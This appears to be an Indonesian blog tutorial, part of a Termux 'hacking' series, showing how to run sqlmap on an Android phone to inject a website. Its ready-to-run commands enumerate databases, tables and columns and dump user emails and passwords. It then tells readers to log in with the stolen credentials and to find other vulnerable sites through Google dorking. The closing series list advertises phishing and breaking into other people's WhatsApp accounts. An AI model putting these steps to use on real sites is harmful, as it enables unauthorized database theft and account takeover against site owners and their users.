Wednesday, January 30, 2019

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root
Artikel ini bertujuan sebagai media pembelajaran, bukan untuk menyerang pihak manapun, kalo sobat belum bisa mikir jangka panjang, lebih baik di close aja tutor ini 👍👍👍.

SQLMAP merupakan hack tool yang dapat di gunakan di atas linux untuk melakukan sql injection, dan mengetes ketebalan sebuah website, dengan melakukan request HTTP dari sebuah website menggunakan teknik :

  1. boolean based blind
  2. time based blind
  3. error based
  4. union query-based
  5. stacked queries

Selain itu, jika kita telah memiliki link yang vulnerable (rentan) dari sebuah website, kita dapat dengan mudah melihat seluruh informasi web tersebut, mulai tables, kolom, dan isinya seperti admin, email, password.

Dan kalo belum, kalian harus mengetahui terlebih dahulu link mana yang vulnerable, dan untuk mencari link tersebut, sobat bisa melakukan dengan cara manual, yaitu mencari pada bagian setiap halaman pages, bisa juga mencari dengan bantuan tools seperti RED_HAWK, dan bisa juga mencari dengan metode dorking melalui pencarian page google.

*Terkadang RED_HAWK suka tidak pasti dalam menginformasikan link vulnerable, justru yang vulnerable, malah di bilang tidak vulnerable.

Jadi, harap hati-hati.

Biasanya link vulnerable itu ada karena si pembuat link "lupa" dalam melakukan escape pada sebuah parameter, biasanya pada bagian "id".

Dan id yang memiliki escape, dan di paksakan untuk di inject, maka akan muncul critical/error seperti ini :

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

Atau bisa juga pada bagian lable atau kategori, tapi jangan selalu di jadikan patokan ya, karena setiap web memiliki link vulnerable yang berbeda.

Dan berikut adalah contoh link vulnerable kategori yang saya dapatkan dari suatu website :

http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12

Link di atas sangat aman, dan siap untuk di inject dengan sqlmap.

Dan sebelum kita memulai injection, kita harus mengetahui dulu dasar-dasar perintah pada sqlmap, dan yang paling umum, serta sering di gunakan adalah ini :

  • -u untuk mengambil url
  • -D induk databases
  • -T induk tables
  • -C induk column
  • -h help
  • -v verbosity
  • --dbs untuk mengkalkulasi database
  • --tables untuk membuka tables dari database
  • --columns untuk membuka kolom dari table
  • --dump untuk menghasilkan output .csv dari database

sisanya dapat kalian pelajari sendiri di sini :

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Selanjutnya adalah cara melakukan inject terhadap link, dan berikut caranya :

Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP


#1. kalian harus memasang bahasa python2 dulu, lakukan seperti biasa : pkg install python2

#2. Jika sudah, sobat bisa membuka lazymux, lalu cari dan pasang sqlmap.

Belum punya lazymux ? baca artikel di bawah ini dulu sob :

Cara memasang lazymux di Termux Android - by Cuman Android

#3. Kemudian, buka folder sqlmap, dan test programnya apakah bisa jalan atau tidak dengan mengetikan perintah : python2 sqlmap.py

#4. Jika bisa, Selanjutnya adalah mengkalkulasi database dari sebuah website, dan yang kita perlukan adalah perintah -u untuk mengambil URL, dan --dbs untuk kalkulasi database, maka perintahnya adalah :

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 --dbs

Kemudian pencet enter, dan biarkan sqlmap mengkalkulasi database, dan setelah selesai, akan muncul daftar databasesnya, selanjutnya kita perlu mengakses database yang kita inginkan.

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#5. Dan sekarang kita ingin melihat tables yang ada di dalam database hackyourselffirst_db, maka perintah yang akan di gunakan adalah -u untuk mengambil url, -D untuk induk database yang di pakai, kemudian --tables untuk membuka tables dari induk database hackyourselffirst_db.

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db --tables

Kemudian pencet enter, maka akan muncul tables dari induk database hackyourselffirst_db.

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#6. Selanjutnya kita perlu memilih column yang ingin kita lihat dari sebuah tables, contohnya saya ingin melihat isi column dari tables UserProfile.

Maka perintah yang di gunakan adalah -u untuk mengambil url, -D induk database yang di pakai, -T tables yang akan di pakai, --columns untuk menampilkan column (kolom).

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db -T UserProfile --columns

Kemudian pencet enter, maka akan tampil banyaknya column yang berhasil terindex dari table UserProfile.

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#7. Terakhir adalah kita hanya perlu melihat isi columnnya, nah column ini berisi infromasi, bukan seperti tables, dan induk lagi.

Yang mana, sobat bisa mencari id_card, address, email, password jika memang tersedia.

Maka perintah yang di gunakan adalah -u untuk mengambil url, -D untuk induk database yang di pakai, -T untuk induk tables yang di pakai, -C untuk induk column yang akan di pakai.

Di sini, saya menggunakan column email, dan tambahkan --dump untuk langsung mengoutput, atau menyimpan isi dari column email dalam bentuk .csv ke folder parent yang ada di aplikasi termux.

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db -T UserProfile -C Email --dump

Kemudian pencet enter, maka akan langsung di tampilkan isi dari column email, serta langsung di save ke folder parent di aplikasi termux.

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#8. Dan untuk kembali, jangan pencet back, tapi arahkan ke tables dan columnnya, misalnya mau ambil password, maka cukup masukan kembali perintah ini :

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db -T UserProfile -C Password --dump

Atau, kalo mau pindah database, cukup masukan perintah :

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 --dbs

Nah setelah melakukan injection, kita sudah memiliki informasi dari website tersebut, dan jika kita ingin mendapatkan informasi tambahan seperti http header dan body yang berisi xml, dan kode google analytic, kita perlu menggunakan perintah verbosity atau -v

Apa itu verbosity ?

Verbosity merupakan perintah sqlmap untuk melihat payload apa saja yang di kirim pada HTTP request, dan verbosity memiliki tingkatan level, mulai dari 1 sampai 6, dan tingkatan tertinggi adalah level yang ke 6, dimana sobat bisa melihat http body dan header secara keseluruhan.

Lalu, untuk menggunakan verbosity ini caranya sangat mudah, cukup tambahkan -v LEVEL di belakang url.

Maka hasilnya akan seperti ini :

python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -v 6

Hasil dari verbosity :

Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

Nah itu lah cara yang paling mudah dalam mengambil informasi dari sebuah website, dan kenapa mudah ? karena cara di atas langsung menggunakan link vulnerable, sehingga tidak perlu menggunakan parameter serta dorking, jadi prosesnya bisa lebih cepat, dan tidak ada error critical.

Kemudian, jika proses dump tadi sudah selesai, sobat bisa melihat file .csv hasil dump di com.termux/files/home/.sqlmap/output

Dan seperti ini cara mengaksesnya :

$ls
$cd .sqlmap
$cd output
$ ls
$ cd hack-yourself-first.com
$ ls
$ cd dump
$ ls
$ cd hackyourselffirst_db
$ ls
$cat UserProfile.csv

atau bisa juga di buka menggunakan nano

kemudian, tinggal sobat simpan saja email, dan passwordnya ke dalam file, bisa txt, doc atau csv, lalu cara menyesuaikan password dengan email adalah dengan mengurutkannya.

Jika sobat ingin menggunakan email pada urutan ke 5, maka passwordnya juga ada di urutan ke 5, paham kan ?.

Apabila email dan passwordnya sudah dapat, sobat cukup login saja untuk mengetest berhasil atau tidak, dan untuk login, sobat bisa kunjungi link ini, lalu cari menu login :

http://hack-yourself-first.com

Itu lah cara melakukan injection terhadap website menggunakan sqlmap, dan pakai cara ini sebijak mungkin, dan jangan merugikan orang lain.

Sekian, dan sampai jumpa di tutorial ngoprek berikutnya.

Jangan lupa kunjungi channel Cuman-Android untuk mendapatkan tutorial keren lainnya :

https://www.youtube.com/channel/UCu3LMeX2xlqBZl7cBlXz8JA

Part lanjutan untuk belajar termux :

#Part ke 2 :

- Cara Menggunakan Termux untuk Pemula, Part 2 : Pemasangan dan Penggunaan Package di Termux [Guide] - Tanpa Root  

#Part ke 3 :

Cara Menggunakan Termux untuk Pemula, Part 3 : Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

#Part ke 4 :

Cara Menggunakan Termux untuk Pemula, Part 4 : Cara Memasang Hacking Toolbox, dan Menggunakannya (Lazymux) - Tanpa Root

#Part ke 5 :

- Cara Menggunakan Termux untuk Pemula, Part 5 : Nambang Crypto pake Termux - Tnapa Root

#Part ke 6 :

Cara Menggunakan Termux untuk Pemula, Part 6 : Membuat Script Sendiri  - Tanpa Root

#Part ke 7 :

- Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#Part ke 8 :

- Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

#Part ke 9 :

- Cara Menggunakan Termux untuk Menengah, Part 9 : Cara Terbaru Memasang package NGROK di Termux Android [TANPA ROOT]

#Part ke 10 :

- Cara Menggunakan Termux untuk Menengah, Part 10 : Seni menggunakan weeman untuk menjebak seseorang menggunakan Termux (Tanpa Root)

#Part ke 11 :

- Cara Menggunakan Termux untuk Menengah, Part 11 : Cara Paling Halal Mendapatkan Follower Instagram Melalui Termux Android [100% Gratis + Tanpa Root]

#Part ke 12 :

- Cara Menggunakan Termux untuk Expert , Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit 

#Part ke 13 : Belum Rilis

Nyesel loh kalo gak nanya ;)
EmoticonEmoticon